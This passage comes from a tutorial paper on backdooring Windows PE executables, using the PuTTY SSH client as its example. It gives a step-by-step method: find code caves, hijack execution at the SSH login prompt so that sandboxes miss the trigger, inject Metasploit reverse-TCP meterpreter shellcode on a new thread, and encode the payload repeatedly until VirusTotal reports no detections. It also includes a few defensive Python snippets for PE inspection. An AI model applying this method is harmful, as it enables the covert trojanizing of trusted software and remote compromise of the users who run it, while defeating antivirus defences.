jumping to, for example, a particular exploited function in memory, ASLR randomly
arranges the address space positions of key data areas of a process, including the base of
the executable and the positions of the stack, heap and libraries.
Code Caves: A code cave is a piece of code that is written to another process’s memory by
another program. The code can be executed by creating a remote thread within the target
process. The Code cave of a code is often a reference to a section of the code’s script
functions that have capacity for the injection of custom instructions. For example, if a
script’s memory allows for 5 bytes and only 3 bytes are used, then the remaining 2 bytes
can be used to add external code to the script. This is what is referred to as a Code cave.
Checksum: A checksum is a small-sized datum from a block of digital data for the purpose
of detecting errors which may have been introduced during its transmission or storage. It is
usually applied to an installation file after it is received from the download server. By
themselves, checksums are often used to verify data integrity but are not relied upon to
verify data authenticity.

Main Methods
All the implementations and examples in this paper use the PuTTY SSH client executable.
There are several reasons for selecting PuTTY for backdooring practice. One is that the PuTTY
client is a native C project that uses multiple libraries and Windows APIs. Another
is that backdooring an SSH client attracts less attention: because the program already makes
TCP connections, it is easier to avoid blue team network monitoring.
The backdoor code that will be used is Stephen Fewer’s reverse TCP
meterpreter shellcode from the Metasploit project. The main goal is injecting the meterpreter
shellcode into the target PE file without disrupting the actual functionality of the program.
The injected shellcode will execute on a new thread and will try to connect to the handler
continuously. While doing all this, another goal is keeping the detection score as low as
possible.
The common approach for implanting backdoors in PE files consists of 4 main steps:
1) Finding available space for backdoor code
2) Hijacking execution flow
3) Injecting backdoor code
4) Restoring execution flow
In each step there are small details that are the key to implanting consistent, durable and
undetectable backdoors.

Available Space Problem


Finding available space is the first step. How you select the right
space inside the PE file to insert the backdoor code is very important, because the detection score of
the backdoored file depends heavily on how you solve the space problem. There are
two main approaches for solving the space problem:
1) Adding A New Section
This one has more drawbacks for the detection score than the other approach, but
because a whole new section is appended there is no space limit for the backdoor code that will
be implanted.
Using a disassembler or a PE editor like LordPE, any PE file can be enlarged by adding
a new section header. Here is the section table of the PuTTY executable; with the help of the PE
editor, a new section “NewSec” is added with a size of 1000 bytes.
While creating the new section, setting the section flags to “Read/Write/Execute” is vital for
running the backdoor shellcode when the PE image is mapped into memory.

After adding the section header, the file size needs to be adjusted. This can easily be
achieved by appending null bytes equal to the size of the section at the end of the file in a hex
editor.
After these operations a new empty section has been added to the file. Running the file
after adding the new section is suggested in order to catch any errors; if the executable runs
smoothly, the new section is ready to be modified in a debugger.

Solving the space problem by adding a new section has a few drawbacks for the anti detection
score. Almost all AV products recognize uncommon sections, and giving full
(Read/Write/Execute) permissions to an uncommon section is certainly very suspicious.
Even when only an empty full-permission section is added to the PuTTY executable, it gets flagged as
malicious by some AV products.
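
The kind of check that makes such a section stand out can be sketched in a few lines. The Python below is only an illustrative sketch, not the logic of any particular AV product: it walks the section table of a PE image and reports sections whose characteristics contain both the write and the execute flag. The function names are made up for this example; the header offsets and flag values come from the PE format.

```python
import struct

# Section characteristic flags defined by the PE format.
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def list_sections(data):
    """Return (name, characteristics) for every section header in a PE image."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    # Section table follows the signature (4), file header (20) and optional header.
    table = e_lfanew + 24 + opt_size
    sections = []
    for i in range(num_sections):
        off = table + i * 40  # each section header is 40 bytes
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        chars = struct.unpack_from("<I", data, off + 36)[0]
        sections.append((name, chars))
    return sections


def writable_and_executable(data):
    """Names of sections that are both writable and executable."""
    wx = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    return [name for name, chars in list_sections(data) if (chars & wx) == wx]
```

Running writable_and_executable(open(path, "rb").read()) on an unmodified, compiler-generated executable would normally be expected to return an empty list, which is why a full-permission section is such an easy indicator.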
2) Code Caves
The second approach for solving the space problem is using the code caves of the target
executable. Almost all compiled binary files have code caves that can be used in
backdooring operations. Using code caves instead of newly added sections attracts far less
attention from AV products because already existing, common sections are used. Also, the overall size of the PE
file will not change at the end of the backdooring process, but this method also has a few
drawbacks.
The number and size of the code caves vary from file to file, but generally there is not as much
space as when adding a new section. When using code caves, the backdoor code should be
trimmed as much as possible. Another drawback is the section flags. Since the execution of
the application will be redirected to the cave, the section that contains the cave must
have “execute” privileges, and some shellcodes (encoded or obfuscated in a self-modifying
way) also need “write” privileges in order to make changes inside the section.
Using multiple code caves helps overcome the space limitation, and
splitting the backdoor code into pieces has a positive effect on the detection score, but
unfortunately changing the section privileges will look suspicious. There are a few advanced
methods that modify the memory region privileges at runtime in order to avoid changing
the section privileges directly, but because those methods require custom crafted
shellcodes, encoders and IAT parsing techniques, they will be the subject of the next article.
With the help of a tool called Cminer it is very easy to enumerate all code caves of a binary
file. The ./Cminer putty.exe 300 command enumerates the code caves that are larger than 300
bytes.
In this case there are 5 good code caves that can be used. The start address gives the virtual
memory address (VMA) of the cave, which is the address of the cave when the PE file is loaded into
memory. The file offset is the location of the cave inside the PE file, in bytes.
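
The relationship between the two numbers is plain section arithmetic: subtract the image base to get a relative virtual address (RVA), find the section that contains it, and add the distance from the section start to that section's raw data pointer. The sketch below is a minimal illustration; the function name is made up, and the section values used in the usage note are invented for the example, not taken from the PuTTY binary.

```python
def va_to_file_offset(va, image_base, sections):
    """Map a virtual address to a file offset using section header values.

    sections is an iterable of tuples:
        (virtual_address, virtual_size, pointer_to_raw_data, size_of_raw_data)
    Returns None if the address has no backing bytes in the file.
    """
    rva = va - image_base
    for virt_addr, virt_size, raw_ptr, raw_size in sections:
        if virt_addr <= rva < virt_addr + max(virt_size, raw_size):
            delta = rva - virt_addr
            if delta >= raw_size:
                # Part of the section that exists only in memory (zero-filled tail).
                return None
            return raw_ptr + delta
    return None
```

With a hypothetical image base of 0x400000 and a hypothetical data section at RVA 0x7A000 whose raw data starts at file offset 0x78000, the address 0x47A478 maps to file offset 0x78478.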
It seems most of the caves are inside data sections. Because data sections do not have
execute privileges, the section flags need to be changed. The backdoor code will be around 400-
500 bytes, so cave 5 should be more than enough. The start address of the selected cave
should be saved. After changing the section privileges to R/W/E, the first step of the
backdooring process is complete. Now it is time to redirect the execution.

Hijacking Execution Flow


In this step, the goal is redirecting the execution flow to the backdoor code by modifying an
instruction in the target executable. There is one important detail about selecting the
instruction that will be modified. Every binary instruction has a size in bytes, and in
order to jump to the backdoor code address a long jump will be used, which is 5 or 6 bytes.
So when patching the binary, the instruction that is patched needs to be the same size
as a long jump instruction, otherwise the previous or next instruction will be corrupted.
Selecting the right place for redirecting the execution is very important for bypassing the
dynamic and sandbox analysis mechanisms of AV products. If the redirection occurs directly, it
will probably be detected at the dynamic analysis phase of AV scanners.
Hiding Under User Interaction:
The first things that come to mind for bypassing the sandbox/dynamic analysis phase are
delaying the execution of the shellcode or designing sandbox-aware shellcodes and trigger
mechanisms. But when backdooring, most of the time there is not much space for
adding this kind of extra code inside the PE file. Also, designing anti detection mechanisms in
assembly-level languages requires a lot of time and knowledge.
This method takes advantage of functions that require user interaction in order to
perform operations. Redirecting the execution inside such functions serves as a trigger
mechanism that activates the backdoor code only when a real user is operating the
program. If this method is implemented correctly, it will have a 100% success rate and
it will not increase the backdoor code size.
The “Open” button on the PuTTY executable UI launches a function that checks the validity of
the given IP address.

If the IP address field value is not empty and is valid, it launches a connection function that
tries to connect to the given IP address.
If the client successfully creates an SSH session, a new window pops up and asks for credentials.
This is the point where the redirection will occur. Since no AV product is advanced
enough to replicate this kind of complex usage, the implanted backdoor will not be
detected by automated sandbox and dynamic analysis mechanisms.
Using basic reverse engineering methods like following strings and string references, it
is not hard to find the address of the connection function. After the client establishes a
connection with the given IP, the string “login as: ” is printed to the window that appears.
This string will help us find the address of the connection function. IDA Pro does a very
good job of following string references.
To find the “login as:” string, open Views->Open Subviews->Strings in IDA.

After finding the string, double click on it to go to its location. Inside data sections IDA finds
all the cross references that have been made to the strings; pressing “Ctrl+X” shows all
cross references.
This reference is made inside the function that prints the “login as: ” string.
This is the instruction that is going to be patched. Before making any changes, take
note of the instruction. After the execution of the backdoor code it will be used again.

By changing the PUSH 467C7C instruction to JMP 0x47A478, the redirection phase of the backdooring
process is completed. It is important to take note of the address of the next instruction. It will be
used as the return address after the execution of the backdoor code. The next step is
injecting the backdoor code.

Injecting Backdoor Code


While injecting the backdoor code, the first thing that needs to be done is saving the registers
before the execution of the backdoor. Every value inside the registers is extremely important
for the execution of the program. By placing PUSHAD and PUSHFD instructions at the
beginning of the code cave, all the registers and register flags are stored on the stack. These
values will be popped back after the execution of the backdoor code so the program can
continue execution without any problem.

As mentioned earlier, the backdoor code that will be used is the meterpreter reverse TCP
shellcode from the Metasploit project. But a few changes need to be made inside the shellcode.
Normally the reverse TCP shellcode tries to connect to the handler a given number of times, and if
the connection fails it closes the process by calling the ExitProcess API.

The problem here is that if the connection to the handler fails, the execution of the PuTTY client will
stop. After changing a few lines of the shellcode’s assembly, every time the connection fails the
shellcode will retry connecting to the handler; the size of the shellcode is also decreased.
After making the necessary changes inside the assembly code, compile it with the nasm -f bin
stager_reverse_tcp_nx.asm command. Now the reverse TCP shellcode is ready to use, but it will
not be placed directly. The goal is executing the shellcode on a new thread. In order to
create a new thread instance, there needs to be another shellcode that makes a CreateThread
API call pointing to the reverse TCP shellcode. There is also a shellcode for creating
threads inside the Metasploit project, written by Stephen Fewer.
After placing the shellcode bytes inside the createthread.asm file in hex format as shown above, it is
ready to be assembled with the nasm -f bin createthread.asm command. At this point the shellcode is
ready to be inserted into the cave, but before inserting the shellcode it should be encoded in
order to bypass the static/signature analysis mechanisms of AV products. Because all
encoders inside the Metasploit project are known by the majority of AV products, using custom
encoders is highly suggested. This paper will not cover the making of such custom
shellcode encoders because that will be the subject of another article, but using multiple
Metasploit encoders may also work. After each encoding process, uploading the encoded
shellcode to VirusTotal in raw format and checking the detection score is suggested. Try
every combination until it is undetected, or wait for the next article.
After properly encoding the shellcode, it is time to insert it into the code cave. Select the
instruction just under the PUSHFD and press Ctrl+E in Immunity Debugger; the shellcode will
be pasted here in hex format.

With the xxd -ps createthread command, print the encoded createthread shellcode in hex format, or
open the shellcode with a hex editor and copy the hex values. While pasting the hex values
into the debugger, be careful about the byte limit. These patching operations are made with
Immunity Debugger, and Immunity Debugger has a byte limit when pasting into the edit code
window. It will not paste all of the shellcode, so remember the last 2 bytes of the pasted
shellcode inside the edit code window, and after pressing the OK button continue pasting the bytes
from where they ended. When all of the shellcode is pasted into the code cave, the insertion of the backdoor
code is complete.

Restoring Execution Flow


After the creation of the backdoor code thread, the program needs to return to its ordinary
execution. This means EIP should jump back to the function that redirected the execution
to the cave.
But before jumping back to that function, all the saved registers should be retrieved.
By placing POPFD and POPAD instructions at the end of the shellcode, all saved registers
are popped back from the stack in the reverse of the order in which they were saved. After retrieving the registers there is one
more thing to do before jumping back: executing the hijacked instruction. The PUSH
467C7C instruction was replaced with JMP 0x47A478 in order to redirect the execution of the
program to the code cave. Now, by placing the PUSH 467C7C instruction at the end, the
hijacked instruction is restored as well. It is then time to return to the function that
redirected the execution to the cave by inserting a JMP 0x41CB73 instruction. At the end the
resulting code should look like the code below.

At the end, select all patched and inserted instructions, right-click and choose Copy to
executable. This operation should be done for every instruction that has been modified.
When all instructions are copied and saved to the file, close the debugger and test the
executable. If the executable runs smoothly, the backdoor is ready to use.
Finally, fixing the checksum of the final file is suggested in order to preserve the authenticity of the file and
not look suspicious; this may also help decrease the detection score.
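
The checksum in question is the CheckSum field of the PE optional header. A minimal Python sketch of the commonly documented algorithm is given below for reference. The function names are illustrative, and the code assumes the usual case where e_lfanew is dword-aligned, so that the CheckSum field itself falls on a dword boundary and can be skipped while summing.

```python
import struct


def pe_checksum(data):
    """Compute the PE optional-header checksum for a complete file image."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # PE signature (4) + file header (20) + CheckSum offset in optional header (64).
    checksum_offset = e_lfanew + 88
    padded = data + b"\0" * (-len(data) % 4)  # pad to a dword boundary
    total = 0
    for offset in range(0, len(padded), 4):
        if offset == checksum_offset:
            continue  # the stored checksum itself is excluded from the sum
        total += struct.unpack_from("<I", padded, offset)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)  # fold the carry back in
    total = (total & 0xFFFF) + (total >> 16)
    total = (total + (total >> 16)) & 0xFFFF
    return total + len(data)  # file length is added at the end


def stored_checksum(data):
    """Read the CheckSum value currently stored in the header."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return struct.unpack_from("<I", data, e_lfanew + 88)[0]
```

Comparing pe_checksum(data) with stored_checksum(data) shows whether a file was modified without its header being updated. Note that many ordinary executables carry a stored value of zero, so a mismatch is only a hint and not proof of tampering.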

Conclusion
In the end, when all methods are applied properly, the resulting backdoor is fully undetectable.
POC

It’s time to see our beloved “backdoored” PuTTY in action.

References

http://NoDistribute.com/result/image/Ye0pnGHXiWvSVErkLfTblmAUQ.png
